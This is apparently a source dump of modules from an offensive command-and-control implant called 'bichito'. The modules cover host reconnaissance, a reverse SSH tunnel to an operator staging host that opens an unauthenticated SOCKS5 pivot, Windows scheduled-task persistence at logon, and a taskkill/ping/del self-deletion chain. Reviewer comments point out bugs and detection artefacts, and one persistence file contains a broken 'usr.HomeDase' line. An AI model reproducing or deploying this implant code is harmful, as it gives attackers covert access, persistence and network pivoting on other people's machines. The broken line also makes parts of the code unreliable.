	cmd.Run()
	cmd.Wait()
	arch = "Compiled for "+runtime.GOARCH+": "+ outbuf.String()
	stderr = errbuf.String()
	if stderr != "" {
		return true,"Error Getting Arch:"+stderr
	}

	outbuf.Reset()
	errbuf.Reset()

	//Hostname
	cmd = exec.Command(cmd_path, "-c","hostname")
	cmd.Stdout = &outbuf
	cmd.Stderr = &errbuf
	cmd.Run()
	cmd.Wait()
	hostname = outbuf.String()
	stderr = errbuf.String()
	if stderr != "" {
		return true,"Error Getting Hostname:"+stderr
	}

	outbuf.Reset()
	errbuf.Reset()

	//mac
	// First "link/ether" line of `ip link` only — whichever interface is
	// listed first, not necessarily the one with an active route.
	cmd = exec.Command(cmd_path, "-c","ip link | grep \"link/ether\" | cut -d \"/\" -f 2 | cut -d ' ' -f 2 | head -n 1")
	cmd.Stdout = &outbuf
	cmd.Stderr = &errbuf
	cmd.Run()
	cmd.Wait()
	mac = outbuf.String()
	stderr = errbuf.String()

	if stderr != "" {
		return true,"Error Getting MAC:"+stderr
	}

	outbuf.Reset()
	errbuf.Reset()

	//user
	cmd = exec.Command(cmd_path, "-c","whoami")
	cmd.Stdout = &outbuf
	cmd.Stderr = &errbuf
	cmd.Run()
	cmd.Wait()
	user = outbuf.String()
	stderr = errbuf.String()
	if stderr != "" {
		return true,"Error Getting User:"+stderr
	}

	outbuf.Reset()
	errbuf.Reset()

	//privileges
	// NOTE(review): user is the raw whoami output, which normally ends in a
	// newline that is never trimmed — confirm this comparison can match at
	// all; if not, privileges is always "No root".
	if user == "root" {
		privileges = "root"
	}else{
		privileges = "No root"
	}


	// NOTE(review): SysInfo's fields are Pid, Arch, Os, OsV, ... but this
	// positional literal passes os, osv, arch in that order, so Arch gets
	// the os string, Os the version and OsV the arch.
	sysinfo := SysInfo{pid,os,osv,arch,hostname,mac,user,privileges}
	bufRP := new(bytes.Buffer)
	// Encode error ignored; Encode appends a trailing newline.
	json.NewEncoder(bufRP).Encode(sysinfo)
	resultRP := bufRP.String()
	return false,resultRP
}
--------------------------------------------------------------------------------
/src/client/electronGUI/components/createforms/createImplant.html:
--------------------------------------------------------------------------------

Craft Implants

--------------------------------------------------------------------------------
/src/bichito/modules/biterpreter/sysinfo_no_native_windows.go:
--------------------------------------------------------------------------------
// +build windows-sysnonative
// NOTE(review): a build tag containing '-' is not an alphanumeric term in
// the +build syntax — confirm this constraint is ever satisfied by a build.


package biterpreter

import (

	"os/exec" // requirement to execute commands against target system
	"bytes"
	"encoding/json"
	"runtime"
)

// SysInfo is the JSON report this module returns. Fields are declared in
// the order Pid, Arch, Os, OsV, Hostname, Mac, User, Privileges; a
// positional composite literal must follow that order.
type SysInfo struct {
	Pid string `json:"pid"`
	Arch string `json:"arch"`
	Os string `json:"os"`
	OsV string `json:"osv"`
	Hostname string `json:"hostname"`
	Mac string `json:"mac"`
	User string `json:"user"`
	Privileges string `json:"privileges"`

}

/*
Description: Sysinfo No Native --> Windows. Retrieve Operating System key information from the foothold.
Flow:
A.Use OS commands to retrieve foothold key info
*/
// Sysinfo returns (errorFlag, payload): on success false and the SysInfo
// struct JSON-encoded (with Encode's trailing newline); on failure true and a
// message built from the first command that wrote to stderr.
//
// NOTE(review): this is the Linux variant's command set (/bin/sh, uname,
// cat /etc/issue.net, ip link, whoami) under a Windows build tag. None of
// those are part of Windows, so as written the first exec fails and the
// module cannot produce a report — confirm whether this file is ever built.
func Sysinfo() (bool,string){

	var(
		pid,os,osv,arch,hostname,mac,user,privileges string
		outbuf, errbuf bytes.Buffer
	)

	//Pid
	cmd_path := "/bin/sh"
	cmd := exec.Command(cmd_path, "-c","echo $$")
	cmd.Stdout = &outbuf
	cmd.Stderr = &errbuf
	// Run already waits for the child; the extra Wait returns an error for
	// a second wait, and both errors are discarded (same pattern for every
	// step below). A missing /bin/sh is therefore never reported — only
	// stderr text is.
	cmd.Run()
	cmd.Wait()
	pid = outbuf.String()
	stderr := errbuf.String()
	if stderr != "" {
		return true,"Error Getting OS:"+stderr
	}

	// Unlike the darwin/linux variants, the buffers are reset here before
	// the next command.
	outbuf.Reset()
	errbuf.Reset()

	//Os
	cmd = exec.Command(cmd_path, "-c","uname")
	cmd.Stdout = &outbuf
	cmd.Stderr = &errbuf
	cmd.Run()
	cmd.Wait()
	os = "Compiled for windows: " + outbuf.String()
	stderr = errbuf.String()
	if stderr != "" {
		return true,"Error Getting OS:"+stderr
	}

	outbuf.Reset()
	errbuf.Reset()

	//OS Version
	cmd = exec.Command(cmd_path, "-c","cat /etc/issue.net")
	cmd.Stdout = &outbuf
	cmd.Stderr = &errbuf
	cmd.Run()
	cmd.Wait()
	osv = outbuf.String()
	stderr = errbuf.String()
	if stderr != "" {
		return true,"Error Getting OS Version:"+stderr
	}

	outbuf.Reset()
	errbuf.Reset()

	//Arch
	cmd = exec.Command(cmd_path, "-c","uname -m")
	cmd.Stdout = &outbuf
	cmd.Stderr = &errbuf
	cmd.Run()
	cmd.Wait()
	arch = "Compiled for "+runtime.GOARCH+": "+ outbuf.String()
	stderr = errbuf.String()
	if stderr != "" {
		return true,"Error Getting Arch:"+stderr
	}

	outbuf.Reset()
	errbuf.Reset()

	//Hostname
	cmd = exec.Command(cmd_path, "-c","hostname")
	cmd.Stdout = &outbuf
	cmd.Stderr = &errbuf
	cmd.Run()
	cmd.Wait()
	hostname = outbuf.String()
	stderr = errbuf.String()
	if stderr != "" {
		return true,"Error Getting Hostname:"+stderr
	}

	outbuf.Reset()
	errbuf.Reset()

	//mac
	cmd = exec.Command(cmd_path, "-c","ip link | grep \"link/ether\" | cut -d \"/\" -f 2 | cut -d ' ' -f 2 | head -n 1")
	cmd.Stdout = &outbuf
	cmd.Stderr = &errbuf
	cmd.Run()
	cmd.Wait()
	mac = outbuf.String()
	stderr = errbuf.String()

	if stderr != "" {
		return true,"Error Getting MAC:"+stderr
	}

	outbuf.Reset()
	errbuf.Reset()

	//user
	cmd = exec.Command(cmd_path, "-c","whoami")
	cmd.Stdout = &outbuf
	cmd.Stderr = &errbuf
	cmd.Run()
	cmd.Wait()
	user = outbuf.String()
	stderr = errbuf.String()
	if stderr != "" {
		return true,"Error Getting User:"+stderr
	}

	outbuf.Reset()
	errbuf.Reset()

	//privileges
	// NOTE(review): user is the raw whoami output with its trailing newline
	// untrimmed, and "root" is not a Windows account name anyway — this
	// branch cannot match on the platform the build tag names.
	if user == "root" {
		privileges = "root"
	}else{
		privileges = "No root"
	}


	// NOTE(review): SysInfo's fields are Pid, Arch, Os, OsV, ... but this
	// positional literal passes os, osv, arch in that order, so Arch gets
	// the os string, Os the version and OsV the arch.
	sysinfo := SysInfo{pid,os,osv,arch,hostname,mac,user,privileges}
	bufRP := new(bytes.Buffer)
	// Encode error ignored; Encode appends a trailing newline.
	json.NewEncoder(bufRP).Encode(sysinfo)
	resultRP := bufRP.String()
	return false,resultRP
}
--------------------------------------------------------------------------------
/src/bichito/modules/biterpreter/inject_rev_sshSOCKS5_trio.go:
--------------------------------------------------------------------------------
// +build linux darwin windows


package biterpreter

import (

	"io"
	"net"
	"golang.org/x/crypto/ssh"
	"github.com/armon/go-socks5"
	"time"
	"encoding/json"
	//"fmt"
	"log"
	"io/ioutil"
)

/* JSON struct already declared in revSSHSHELL module
This JSON Object definition is needed in some Implants Modules to decode parameters
Hive will have the same definitions in: ./src/hive/hiveJobs.go

type InjectRevSshShellBichito struct {
	Domain string `json:"domain"`
	Sshkey string `json:"sshkey"`
	Port string `json:"port"`
	User string `json:"user"`
	//Socks5Port string `json:"socks5port"` //This is the SOCKS5 port that will be opened in the implant device
}
*/

/*
Description: Inject Reverse Socks5
Flow:
A.Use golang ssh native library to spawn a ssh client that connects to a target staging
A1.Use provided credentials (username and pem key), for the ssh connection
B.This connection will create a listener in 2222 localport of target staging
C.Open a SOCKS5 socket in bichito, then any remote receiving connection (remote SSH listen socket) will be TCP redireced to SOCKS5
*/
// RevSshSocks5 returns (errorFlag, message): true plus a reason when setup
// failed, false plus a success string once the remote listener is up. Setup
// is identical to RevSshShell up to the remote bind; the difference is what
// listenSSHSocks5 does with accepted connections.
func RevSshSocks5(jsonparams string) (bool,string){

	//Debug
	//fmt.Println(jsonparams)

	var revsshshellparams *InjectRevSshShellBichito
	errDaws := json.Unmarshal([]byte(jsonparams),&revsshshellparams)
	if errDaws != nil {
		return true,"Parameters JSON Decoding error:"+errDaws.Error()
	}

	// loadPrivateKey is defined elsewhere in the package; it turns the PEM
	// text in Sshkey into an ssh.AuthMethod.
	auth, err := loadPrivateKey(revsshshellparams.Sshkey)
	if err != nil {
		return true,"Load Key String error"
	}

	config := &ssh.ClientConfig{
		User: revsshshellparams.User,
		Auth: nil,
		// Accepts any host key, so the staging server is never
		// authenticated (same effect as ssh.InsecureIgnoreHostKey()) —
		// the same policy as RevSshShell.
		HostKeyCallback: func(hostname string, remote net.Addr, key ssh.PublicKey) error {
			return nil
		},
		Timeout:time.Second * 1,
	}

	config.Auth = append(config.Auth, auth)

	// Dial the SSH connection
	sshConn, err := ssh.Dial("tcp", revsshshellparams.Domain+":"+revsshshellparams.Port, config)
	if err != nil {
		return true,"Error: error dialing remote host:"+err.Error()
	}


	// Listen on remote
	// Remote port forward on the hard-coded loopback port of the staging
	// host; every connection made to it there is handed back here.
	l, err := sshConn.Listen("tcp", "127.0.0.1:2222")
	if err != nil {
		return true,"Error: error listening on remote host:"+err.Error()
	}

	go listenSSHSocks5(sshConn,l)//,revsshshellparams.Socks5Port)

	return false,"Success: Rev SSH Socks5 Connected to Staging"
}


// listenSSHSocks5 serves every connection accepted on the remote listener
// as a SOCKS5 session from this process, i.e. traffic entering
// 127.0.0.1:2222 on the staging host leaves from this host's network
// position. Unlike listenSSH it keeps serving connections concurrently and
// exits — closing the SSH client — on the first Accept error.
func listenSSHSocks5(sshconn *ssh.Client,l net.Listener){//,socks5port string){

	defer sshconn.Close()

	//Make sure SOCKS5 don't log stuff
	logger := log.New(ioutil.Discard, "", log.LstdFlags)
	// Only a Logger is set: no AuthMethods and no Rules, so the proxy is
	// presumably unauthenticated and unrestricted (go-socks5 defaults —
	// confirm). Anyone who can reach the loopback port on the staging
	// host can use it.
	conf := &socks5.Config{Logger:logger}
	//conf := &socks5.Config{}
	server, err := socks5.New(conf)
	if err != nil {
		return
	}

	// Start accepting shell connections
	for {

		conn, err := l.Accept()
		if err != nil {
			//continue
			return
		}

		// ServeConn's error is dropped; each session is its own goroutine
		// and nothing bounds how many run at once.
		go server.ServeConn(conn)

	}
}


// redirectTCP copies client<->remote in both directions and returns when
// the first direction ends. It is not referenced elsewhere in this file.
func redirectTCP(client net.Conn, remote net.Conn) {
	defer client.Close()
	// NOTE(review): chDone is unbuffered and received from exactly once
	// below; the goroutine that finishes second blocks forever on its send,
	// so one goroutine leaks per call. A buffer of 2 (or a WaitGroup) fixes it.
	chDone := make(chan bool)

	// Start remote -> local data transfer
	go func() {
		defer client.Close()
		defer remote.Close()

		_, err := io.Copy(client, remote)
		if err != nil {
			//log.Println(fmt.Sprintf("error while copy remote->local: %s", err))
		}
		chDone <- true
	}()


	// Start local -> remote data transfer
	go func() {
		defer client.Close()
		defer remote.Close()

		_, err := io.Copy(remote, client)
		if err != nil {
			//log.Println(fmt.Sprintf("error while copy local->remote: %s", err))
		}
		chDone <- true
	}()


	<-chDone

}
--------------------------------------------------------------------------------
/src/bichito/modules/persistence/windows_schtasks/windows_schtasks.go:
--------------------------------------------------------------------------------
// +build 386

package windows_schtasks

import (
	"bichito/modules/biterpreter"
	"encoding/json"
	"os/user"
	"unsafe"
	"os"
	"path/filepath"
	//Debug
	//"fmt"
)

// The cgo preamble links the 32-bit Task Scheduler import library
// (taskschd) plus COM support; SchtasksOnUserLogon and SchtasksDelete are
// declared in windows_schtasks.h, which is not part of this listing. The
// bare `#include` lost its header name in this rendering (presumably
// <stdlib.h> for malloc/free — confirm against the repository).

/*
#cgo CXXFLAGS: -I"../../../../../winDependencies/includes/"
#cgo LDFLAGS: -L"../../../../../winDependencies/libs/x86/" -ltaskschd -lcomsupp -lole32 -loleaut32 -static
#include "windows_schtasks.h"
#include
*/
import "C"


// BiPersistenceWinSchtasks is decoded from the job JSON: Path is the file
// name, relative to the user's home directory, that the implant copy is
// written to; TaskName is the scheduled task that starts it.
type BiPersistenceWinSchtasks struct {
	Path string `json:"implantpath"`
	TaskName string `json:"taskname"`
}

// moduleParams is package state shared by all three entry points and
// overwritten on every call. NOTE(review): if hive can dispatch two
// persistence jobs concurrently this is a data race — confirm dispatch is
// serialized.
var moduleParams *BiPersistenceWinSchtasks


// AddPersistenceSchtasks writes blob to <home>\<Path> and registers a
// scheduled task named TaskName that runs it at user logon. Returns
// (errorFlag, message). From a defender's view the artefacts are a new
// executable under the user profile and a task created through the Task
// Scheduler API (Task Scheduler operational log; Security 4698 with object
// auditing enabled).
func AddPersistenceSchtasks(jsonPersistence string,blob string) (bool,string){

	errDaws := json.Unmarshal([]byte(jsonPersistence),&moduleParams)
	if errDaws != nil{
		return true,"Error Decoding Persistence Module Params:" + errDaws.Error()
	}


	//Craft Userland Path:

	usr, err := user.Current()
	if err != nil {
		return true,"Error Getting User Context:" + err.Error()
	}

	// Plain string join, no Clean: a Path containing ".." leaves the home
	// directory. The value comes from the operator, but it is still
	// unvalidated input reaching the filesystem.
	userPath := usr.HomeDir +"\\"+ moduleParams.Path

	// biterpreter.Upload (not shown) writes blob to userPath.
	errUpload,stringErr := biterpreter.Upload(userPath,blob)
	if errUpload{
		return true,"Error Uploading Implant on Persistence:" + stringErr
	}


	var ptrPath *C.char = C.CString(userPath)
	defer C.free(unsafe.Pointer(ptrPath))

	var ptrName *C.char = C.CString(moduleParams.TaskName)
	defer C.free(unsafe.Pointer(ptrName))

	// 1024 bytes of uninitialised heap for the C side's error text. No
	// length is passed, so the C code must both bound its writes and
	// NUL-terminate; if it writes nothing, GoString below reads garbage
	// until it finds a NUL.
	ptrError := C.malloc(C.sizeof_char * 1024)
	defer C.free(unsafe.Pointer(ptrError))

	// `error` shadows the builtin error type for the rest of the function.
	// Return value 1 is success, per the comparison below.
	error := C.SchtasksOnUserLogon((*C.char)(ptrPath),(*C.char)(ptrName),(*C.char)(ptrError))

	errorString := C.GoString((*C.char)(ptrError))
	if (error != 1){

		return true,"Schtasks Error:" + string(errorString)
	}

	return false,"Persisted"
}

// CheckPersistenceSchtasks reports whether the implant copy still exists at
// <home>\<Path>. It does not query the scheduled task itself, so a task
// deleted by a defender while the file remains is still reported as
// "Persisted". The first return value is the error flag and stays false on
// both outcomes.
func CheckPersistenceSchtasks(jsonPersistence string) (bool,string){

	errDaws := json.Unmarshal([]byte(jsonPersistence),&moduleParams)
	if errDaws != nil{
		return true,"Error Decoding Persistence Module Params:"+ errDaws.Error()
	}

	//Check if file on path exists
	usr, err := user.Current()
	if err != nil {
		return true,"Error Getting User Context:" + err.Error()
	}
	userPath := usr.HomeDir +"\\"+ moduleParams.Path

	// biterpreter.Accesschk (not shown) returns a true flag when the
	// path is not accessible; no separator before stringErr.
	errA,stringErr := biterpreter.Accesschk(userPath)
	if errA != false {
		return false, "Non Persisted"+stringErr
	}

	return false,"Persisted"
}


// RemovePersistenceSchtasks deletes the scheduled task and then removes the
// implant file by spawning a detached command line that force-kills every
// process with this executable's image name, sleeps via ping, and deletes
// the file. That taskkill / ping-as-sleep / del chain is a widely recognised
// self-deletion idiom and a good hunting signature in command-line
// telemetry. Returns (errorFlag, message).
func RemovePersistenceSchtasks(jsonPersistence string) (bool,string){

	errDaws := json.Unmarshal([]byte(jsonPersistence),&moduleParams)
	if errDaws != nil{
		return true,"Error Decoding Persistence Module Params:" + errDaws.Error()
	}

	var genError string
	usr, err := user.Current()
	if err != nil {
		return true,"Error Getting User Context:" + err.Error()
	}

	//Remove Task
	var ptrName *C.char = C.CString(moduleParams.TaskName)
	defer C.free(unsafe.Pointer(ptrName))

	// Same uninitialised, unbounded error buffer as in Add.
	ptrError := C.malloc(C.sizeof_char * 1024)
	defer C.free(unsafe.Pointer(ptrError))

	error := C.SchtasksDelete((*C.char)(ptrName),(*C.char)(ptrError))

	errorString := C.GoString((*C.char)(ptrError))

	//Remove Implant: spawn child process that kills father, wait and remove executable
	userPath := usr.HomeDase +"\\"+ moduleParams.Path

	// filepath.Base(os.Args[0]) is the image name; taskkill /im matches
	// every process with that name, not only this one. userPath is
	// interpolated unquoted, so a path with spaces breaks the del.
	execErr,stringerr := biterpreter.Exec("taskkill /f /im "+filepath.Base(os.Args[0])+" && ping 127.0.0.1 -n 6 > nul && del "+userPath)
	if execErr != false {
		genError = "File Removed Already" + stringerr
	}



	if (error != 1) || (execErr != false){

		return true,"Schtasks Error:" + string(errorString) +"Wipe Error:" + genError
	}

	return false,"Persistence Removed"
}
--------------------------------------------------------------------------------
/src/client/electronGUI/components/console/console.html:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/src/bichito/modules/biterpreter/sysinfo_native_linux.go:
--------------------------------------------------------------------------------
// +build linux

package biterpreter

import (

	"os"
	"os/user"
	"bytes"
	"encoding/json"
	"strconv"
	"syscall"
	"net"
	"strings"
	"runtime"
)

/*
This JSON Object definition is needed in some Implants Modules to decode parameters
Hive will have the same definitions in: ./src/hive/hiveJobs.go
*/
// SysInfo is the JSON report this module returns. Fields are declared in
// the order Pid, Arch, Os, OsV, Hostname, Mac, User, Privileges; a
// positional composite literal must follow that order.
type SysInfo struct {
	Pid string `json:"pid"`
	Arch string `json:"arch"`
	Os string `json:"os"`
	OsV string `json:"osv"`
	Hostname string `json:"hostname"`
	Mac string `json:"mac"`
	User string `json:"user"`
	Privileges string `json:"privileges"`

}

//Utility Function to transform int8 to strings
// int8ToStr converts a NUL-terminated C char array (as []int8) to a Go
// string, stopping at the first 0 byte. NOTE(review): syscall.Utsname's
// arrays are [65]int8 on some GOARCH values and [65]uint8 on others —
// confirm this builds for every Linux target the implant is compiled for.
func int8ToStr(arr []int8) string {
	b := make([]byte, 0, len(arr))
	for _, v := range arr {
		if v == 0x00 {
			break
		}
		b = append(b, byte(v))
	}
	return string(b)
}


/*
Description: Sysinfo --> Linux. Retrieve Operating System key information from the foothold.
Flow:
A.Use Go native libraries and Linux syscalls to retrieve key foothold information
*/
// Sysinfo returns (errorFlag, payload): on success false and the SysInfo
// struct JSON-encoded (with Encode's trailing newline); on failure true and
// a message. Unlike the "no native" variants it spawns no child processes —
// everything comes from os, syscall, net and os/user — so there is no
// process-tree footprint, only the usual library calls.
func Sysinfo() (bool,string){

	var(
		pid,oss,osv,arch,hostname,mac,actualUser,privileges string
		err error
	)


	//Pid
	pid = strconv.Itoa(os.Getpid())


	//OS Distro,version,arch
	var uname syscall.Utsname
	// The `:=` here shadows the outer err; a Uname failure is silently
	// ignored and oss/osv/arch stay empty.
	if err := syscall.Uname(&uname); err == nil {
		// extract members:
		// This local type is never used (Go permits unused local types);
		// it only documents the fields read below.
		type Utsname struct {
			Sysname [65]int8
			// Nodename [65]int8
			Release [65]int8
			Version [65]int8
			Machine [65]int8
			// Domainname [65]int8
		}

		oss = "Compiled for linux: " + int8ToStr(uname.Sysname[:])
		osv = int8ToStr(uname.Release[:])
		// Release and Version are concatenated with no separator.
		osv = osv + int8ToStr(uname.Version[:])
		arch = "Compiled for "+runtime.GOARCH+": "+ int8ToStr(uname.Machine[:])
		//hostname = int8ToStr(uname.Domainname[:])
	}

	//Hostname
	hostname,err = os.Hostname()
	if err != nil {
		return true,"Error Getting Hostname:"+err.Error()
	}


	//Mac
	addrs, erri := net.InterfaceAddrs()

	if erri != nil {
		return true,"Error Getting Mac:"+erri.Error()
	}

	var currentIP, currentNetworkHardwareName string

	// The last non-loopback IPv4 address wins; there is no routing-table
	// lookup, so on multi-homed hosts this is arbitrary.
	for _, address := range addrs {

		// check the address type and if it is not a loopback the display it
		// = GET LOCAL IP ADDRESS
		if ipnet, ok := address.(*net.IPNet); ok && !ipnet.IP.IsLoopback() {
			if ipnet.IP.To4() != nil {
				currentIP = ipnet.IP.String()
			}
		}
	}

	// net.Interfaces error dropped.
	interfaces, _ := net.Interfaces()
	for _, interf := range interfaces {
		if addrs, err := interf.Addrs(); err == nil {
			for _, addr := range addrs {
				// only interested in the name with current IP address
				// Substring match: "10.0.0.1" also matches "10.0.0.10",
				// and when no IPv4 was found currentIP is "" and
				// Contains is true for every address, so the last
				// interface listed is chosen.
				if strings.Contains(addr.String(), currentIP) {
					currentNetworkHardwareName = interf.Name
				}
			}
		}
	}

	netInterface, errm := net.InterfaceByName(currentNetworkHardwareName)
	if errm != nil {
		return true,"Error Getting Mac:"+errm.Error()
	}

	mac = netInterface.HardwareAddr.String()

	//User
	actualUserO,errU := user.Current()

	if errU != nil {
		// NOTE(review): the error is errU, but the message uses err, which
		// is nil at this point (a non-nil hostname error returned above),
		// so a user lookup failure panics on err.Error() instead of
		// returning. Should read errU.Error().
		return true,"Error Getting User:"+err.Error()
	}
	actualUser = actualUserO.Username

	//privileges
	// Username has no trailing newline here, so unlike the "no native"
	// variants this comparison can match.
	if actualUser == "root" {
		privileges = "root"
	}else{
		privileges = "No root"
	}

	// Positional order matches the struct: Pid, Arch, Os, OsV, ...
	sysinfo := SysInfo{pid,arch,oss,osv,hostname,mac,actualUser,privileges}
	bufRP := new(bytes.Buffer)
	// Encode error ignored; Encode appends a trailing newline.
	json.NewEncoder(bufRP).Encode(sysinfo)
	resultRP := bufRP.String()
	return false,resultRP
}
--------------------------------------------------------------------------------
/src/bichito/modules/persistence/windows_schtasks/windows_schtasks_x64.go:
--------------------------------------------------------------------------------
// +build amd64

package windows_schtasks

import (
	"bichito/modules/biterpreter"
	"encoding/json"
	"os/user"
	"unsafe"
	"os"
	"path/filepath"
	//Debug
	//"fmt"
)

// 64-bit twin of windows_schtasks.go: identical Go code, only the library
// search path differs (libs/x64). SchtasksOnUserLogon and SchtasksDelete
// are declared in windows_schtasks.h, which is not part of this listing;
// the bare `#include` lost its header name in this rendering (presumably
// <stdlib.h> for malloc/free — confirm against the repository).

/*
#cgo CXXFLAGS: -I"../../../../../winDependencies/includes/"
#cgo LDFLAGS: -L"../../../../../winDependencies/libs/x64/" -ltaskschd -lcomsupp -lole32 -loleaut32 -static
#include "windows_schtasks.h"
#include
*/
import "C"


// BiPersistenceWinSchtasks is decoded from the job JSON: Path is the file
// name, relative to the user's home directory, that the implant copy is
// written to; TaskName is the scheduled task that starts it.
type BiPersistenceWinSchtasks struct {
	Path string `json:"implantpath"`
	TaskName string `json:"taskname"`
}

// moduleParams is package state shared by all three entry points and
// overwritten on every call. NOTE(review): if hive can dispatch two
// persistence jobs concurrently this is a data race — confirm dispatch is
// serialized.
var moduleParams *BiPersistenceWinSchtasks


// AddPersistenceSchtasks writes blob to <home>\<Path> and registers a
// scheduled task named TaskName that runs it at user logon. Returns
// (errorFlag, message). From a defender's view the artefacts are a new
// executable under the user profile and a task created through the Task
// Scheduler API (Task Scheduler operational log; Security 4698 with object
// auditing enabled).
func AddPersistenceSchtasks(jsonPersistence string,blob string) (bool,string){

	errDaws := json.Unmarshal([]byte(jsonPersistence),&moduleParams)
	if errDaws != nil{
		return true,"Error Decoding Persistence Module Params:" + errDaws.Error()
	}


	//Craft Userland Path:

	usr, err := user.Current()
	if err != nil {
		return true,"Error Getting User Context:" + err.Error()
	}

	// Plain string join, no Clean: a Path containing ".." leaves the home
	// directory. The value comes from the operator, but it is still
	// unvalidated input reaching the filesystem.
	userPath := usr.HomeDir +"\\"+ moduleParams.Path

	// biterpreter.Upload (not shown) writes blob to userPath.
	errUpload,stringErr := biterpreter.Upload(userPath,blob)
	if errUpload{
		return true,"Error Uploading Implant on Persistence:" + stringErr
	}


	var ptrPath *C.char = C.CString(userPath)
	defer C.free(unsafe.Pointer(ptrPath))

	var ptrName *C.char = C.CString(moduleParams.TaskName)
	defer C.free(unsafe.Pointer(ptrName))

	// 1024 bytes of uninitialised heap for the C side's error text. No
	// length is passed, so the C code must both bound its writes and
	// NUL-terminate; if it writes nothing, GoString below reads garbage
	// until it finds a NUL.
	ptrError := C.malloc(C.sizeof_char * 1024)
	defer C.free(unsafe.Pointer(ptrError))

	// `error` shadows the builtin error type for the rest of the function.
	// Return value 1 is success, per the comparison below.
	error := C.SchtasksOnUserLogon((*C.char)(ptrPath),(*C.char)(ptrName),(*C.char)(ptrError))

	errorString := C.GoString((*C.char)(ptrError))
	if (error != 1){

		return true,"Schtasks Error:" + string(errorString)
	}

	return false,"Persisted"
}

// CheckPersistenceSchtasks reports whether the implant copy still exists at
// <home>\<Path>. It does not query the scheduled task itself, so a task
// deleted by a defender while the file remains is still reported as
// "Persisted". The first return value is the error flag and stays false on
// both outcomes.
func CheckPersistenceSchtasks(jsonPersistence string) (bool,string){

	errDaws := json.Unmarshal([]byte(jsonPersistence),&moduleParams)
	if errDaws != nil{
		return true,"Error Decoding Persistence Module Params:"+ errDaws.Error()
	}

	//Check if file on path exists
	usr, err := user.Current()
	if err != nil {
		return true,"Error Getting User Context:" + err.Error()
	}
	userPath := usr.HomeDir +"\\"+ moduleParams.Path
	// biterpreter.Accesschk (not shown) returns a true flag when the
	// path is not accessible; no separator before stringErr.
	errA,stringErr := biterpreter.Accesschk(userPath)
	if errA != false {
		return false, "Non Persisted"+stringErr
	}

	return false,"Persisted"
}


// RemovePersistenceSchtasks deletes the scheduled task and then removes the
// implant file by spawning a detached command line that force-kills every
// process with this executable's image name, sleeps via ping, and deletes
// the file. That taskkill / ping-as-sleep / del chain is a widely recognised
// self-deletion idiom and a good hunting signature in command-line
// telemetry. Returns (errorFlag, message).
func RemovePersistenceSchtasks(jsonPersistence string) (bool,string){

	errDaws := json.Unmarshal([]byte(jsonPersistence),&moduleParams)
	if errDaws != nil{
		return true,"Error Decoding Persistence Module Params:" + errDaws.Error()
	}

	var genError string
	usr, err := user.Current()
	if err != nil {
		return true,"Error Getting User Context:" + err.Error()
	}



	//Remove Task
	var ptrName *C.char = C.CString(moduleParams.TaskName)
	defer C.free(unsafe.Pointer(ptrName))

	// Same uninitialised, unbounded error buffer as in Add.
	ptrError := C.malloc(C.sizeof_char * 1024)
	defer C.free(unsafe.Pointer(ptrError))

	error := C.SchtasksDelete((*C.char)(ptrName),(*C.char)(ptrError))

	errorString := C.GoString((*C.char)(ptrError))

	//Remove Implant: spawn child process that kills father, wait and remove executable
	userPath := usr.HomeDir +"\\"+ moduleParams.Path

	// filepath.Base(os.Args[0]) is the image name; taskkill /im matches
	// every process with that name, not only this one. userPath is
	// interpolated unquoted, so a path with spaces breaks the del.
	execErr,stringerr := biterpreter.Exec("taskkill /f /im "+filepath.Base(os.Args[0])+" && ping 127.0.0.1 -n 6 > nul && del "+userPath)
	if execErr != false {
		genError = "File Removed Already" + stringerr
	}

	/*
	wipeErr,stringerr := biterpreter.Wipe(userPath)
	if wipeErr != false {
		genError = "File Removed Already" + stringerr
	}
	*/

	if (error != 1) || (execErr != false){

		return true,"Schtasks Error:" + string(errorString) +"Wipe Error:" + genError
	}

	return false,"Persistence Removed"
}
--------------------------------------------------------------------------------
/src/bichito/modules/biterpreter/sysinfo_native_darwin/sysinfo_native_darwin.go:
--------------------------------------------------------------------------------
// +build darwin

// Lives in its own package (not biterpreter) and exposes
// SysinfoNativeDarwin rather than Sysinfo, unlike the other variants.
package sysinfo_native_darwin

import (

	"os"
	"os/user"
	"bytes"
	"encoding/json"
	"strconv"
	"net"
	"strings"
	"unsafe"
	"runtime"
)

// Objective-C cgo preamble. The #import/#include lines lost their header
// names in this rendering. arch() copies the local NXArchInfo description
// into res with an unbounded sprintf and never frees the strdup'd copy —
// a small leak per call. The size of res is decided by the Go caller.

/*
#cgo CFLAGS: -x objective-c
#cgo LDFLAGS: -framework Foundation
#import
#import
#include

int arch(char * res){
	int n;
	NXArchInfo *info = NXGetLocalArchInfo();
	NSString *typeOfCpu = [NSString stringWithUTF8String:info->description];
	char *archch = strdup([typeOfCpu UTF8String]);
	n = sprintf(res,"%s",archch);
	return n;
}

int
osv(char * res) {
	/* Writes the OS version string into res and returns its length; same
	   unbounded sprintf / leaked strdup pattern as arch() above. */
	int n;
	NSProcessInfo *pInfo = [NSProcessInfo processInfo];
	NSString *version = [pInfo operatingSystemVersionString];
	char *versionch = strdup([version UTF8String]);
	n = sprintf(res,"%s",versionch);
	return n;
}
*/
import "C"

/*
This JSON Object definition is needed in some Implant Modules to decode parameters.
Hive will have the same definitions in: ./src/hive/hiveJobs.go
*/
type SysInfo struct {
	Pid        string `json:"pid"`
	Arch       string `json:"arch"`
	Os         string `json:"os"`
	OsV        string `json:"osv"`
	Hostname   string `json:"hostname"`
	Mac        string `json:"mac"`
	User       string `json:"user"`
	Privileges string `json:"privileges"`

}


// SysinfoNativeDarwin collects host facts for the darwin build and returns
// them as one JSON-encoded SysInfo, in the module's (error, payload) form:
// (true, message) on failure, (false, json) on success. The json.Encoder
// output keeps its trailing newline and the Encode error is not checked.
//
// Field sources: Pid from os.Getpid; Os fixed to "darwin"; Arch is
// "Compiled for "+GOARCH+": " followed by the cgo arch() description; OsV from
// the cgo osv() helper; Hostname from os.Hostname; Mac is the hardware address
// of the last interface whose address string contains the last non-loopback
// IPv4 address seen; User from user.Current; Privileges is "root" only when
// the username is exactly "root", "No root" otherwise.
func SysinfoNativeDarwin() (bool, string) {

	var (
		pid, oss, osv, arch, hostname, mac, actualUser, privileges string
		err error
	)


	//Pid
	pid = strconv.Itoa(os.Getpid())


	//OS Distro,version,arch
	oss = "darwin"

	// arch()/osv() write into 1024-byte C buffers and return the byte count,
	// which GoBytes uses to copy exactly what was written.
	arch = "Compiled for " + runtime.GOARCH + ": "
	ptrArch := C.malloc(C.sizeof_char * 1024)
	defer C.free(unsafe.Pointer(ptrArch))
